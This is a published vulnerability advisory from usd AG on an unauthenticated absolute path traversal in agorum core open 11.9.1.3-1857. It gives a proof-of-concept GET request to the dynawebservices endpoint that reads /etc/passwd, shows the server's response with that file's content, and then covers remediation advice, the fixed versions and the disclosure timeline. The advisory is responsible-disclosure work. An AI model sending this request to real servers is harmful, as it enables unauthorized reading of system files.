usd-2025-0022 | Agorum core open 11.9.1.3-1857 - Absolute Path Traversal

Product: Agorum core open
Affected Version: 11.9.1.3-1857
Vulnerability Type: Absolute Path Traversal (CWE-36)
Security Risk: High
Vendor: Agorum
Vendor URL: https://www.agorum.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: Requested
CVE Link: Requested
Advisory ID: usd-2025-0022

Description

agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration

Proof of Concept

The dynawebservice of agorum core permits an attacker to access arbitrary files on the system without requiring authentication. The following request can be used to read the /etc/passwd file:

GET /dynawebservices/wsfiling/?action=getTemp&tmpFile=/etc/passwd HTTP/1.1
Host: localhost
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
[...]

The servers response will include the full content of the requested file, as can be seen in the following output:

HTTP/1.1 200 OK
X-Powered-By: agorum core
Content-Length: 3510
Date: Mon, 28 Apr 2025 06:40:05 GMT
Server: Apache-Coyote/1.1

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
[...]

Fix


It is recommended to ensure that user input is properly validated and sanitized to prevent the use of absolute paths or dangerous characters. Always use relative paths for file access to prevent users from navigating outside the intended directories. Implement a whitelist to restrict file access to specific, trusted locations and limit file system permissions to necessary files and directories.

 

Users of agorum core open should upgrade to versions 11.9.2 or 11.10.1.

References

Timeline

  • 2025-05-05: First contact request via email.
  • 2025-05-05: The vendor confirmed receiving our report and began investigating the finding.
  • 2025-05-07: The vendor informed us that a fix is in the works.
  • 2025-05-15: The vendor has addressed and fixed the vulnerability within the cloud instances.
  • 2025-05-30: The vendor released fixed versions 11.9.2 and 11.10.1.
  • 2025-06-27: This advisory is published.

Credits

This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.